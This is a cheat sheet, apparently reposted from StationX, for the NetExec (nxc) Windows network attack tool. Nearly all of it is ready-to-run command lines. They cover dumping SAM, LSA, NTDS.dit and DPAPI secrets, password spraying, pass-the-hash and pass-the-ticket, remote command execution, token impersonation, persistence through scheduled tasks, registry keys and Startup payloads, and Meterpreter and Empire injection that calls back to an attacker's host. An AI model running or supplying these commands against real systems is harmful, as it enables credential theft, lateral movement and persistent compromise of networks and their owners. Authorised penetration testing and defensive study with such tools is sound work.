🛠 NetExec (nxc) Cheat Sheet

NetExec is a network hacking tool for Enumeration, Credential Harvesting, Lateral Movement, and Post-Exploitation in Windows environments.
Syntax:

nxc [runtime options] <protocol> <target> [options] [-M module] [-o module options]

✅ Installation

Kali Linux

apt update
apt install netexec

Python (pipx)

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

GitHub (Poetry)

apt install pipx git
pipx install poetry
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
poetry install
poetry run NetExec

⚙ General Options

• -h → Show help
• -t THREADS → Number of threads
• --timeout TIMEOUT → Timeout per thread
• --jitter INTERVAL → Random delay

🌐 Supported Protocols

smb | winrm | ldap | wmi | mssql | ssh | rdp | ftp | vnc

🔍 Discovery & Enumeration

nxc <protocol> <target>                # Scan for service
nxc smb <target> -u USER -p PASS --users        # Domain users
nxc smb <target> -u USER -p PASS --groups       # Domain groups
nxc smb <target> -u USER -p PASS --computers    # Computers
nxc smb <target> -u USER -p PASS --shares       # Shares
nxc smb <target> -u USER -p PASS -M spider_plus # Dump shares
nxc smb <target> -u USER -p PASS --sessions     # Active sessions
nxc smb <target> -u USER -p PASS --wmi QUERY    # WMI query

🔑 Credential Harvesting & Brute Force

nxc smb <target> -u USER -p PASS --sam          # Dump SAM hashes
nxc smb <target> -u USER -p PASS --lsa          # Dump LSA secrets
nxc smb <target> -u USER -p PASS --ntds vss     # Dump NTDS.dit
nxc smb <target> -u USER -p PASS --dpapi cookies # DPAPI secrets
nxc <protocol> <target> -u USER -p PASS         # Password spray
nxc <protocol> <target> -u USER -H HASH         # Pass-the-Hash
nxc <protocol> <target> -k KERBEROS_TICKET      # Pass-the-Ticket

🚀 Lateral Movement

nxc smb <target> -u USER -p PASS -x "COMMAND"   # Remote command
nxc smb <target> -u USER -p PASS -X "PS_COMMAND" # PowerShell
nxc smb <target> -u USER -p PASS --exec-method wmiexec -x "COMMAND"

🛡 Post-Exploitation

nxc smb <target> -u USER -p PASS -M rdp             # Enable RDP
nxc smb <target> -u USER -p PASS -M impersonate     # Token impersonation
nxc smb <target> -u USER -p PASS -M enum-avproducts # AV products
nxc smb <target> -u USER -p PASS --get-file REMOTE LOCAL
nxc smb <target> -u USER -p PASS --put-file LOCAL REMOTE

🔒 Persistence

nxc smb <target> -u USER -p PASS --x "schtasks /create ..."
nxc smb <target> -u USER -p PASS --x "reg add ..."
nxc smb <target> -u USER -p PASS --put-file <PAYLOAD> "%APPDATA%\Startup\<PAYLOAD>"

🧠 Advanced Features

nxc ldap <target> -u USER -p PASS --bloodhound --collection All
nxc ldap <target> -u USER -p PASS -M teams_localdb
nxc rdp <target> -u USER -p PASS --screenshot
nxc smb <target> -u USER -p PASS -M empire_exec -o LISTENER=<listener>
nxc smb <target> -u USER -p PASS -M met_inject -o LHOST=<IP> LPORT=<PORT>

🔗 Source: StationX NetExec Cheat Sheet

Share this content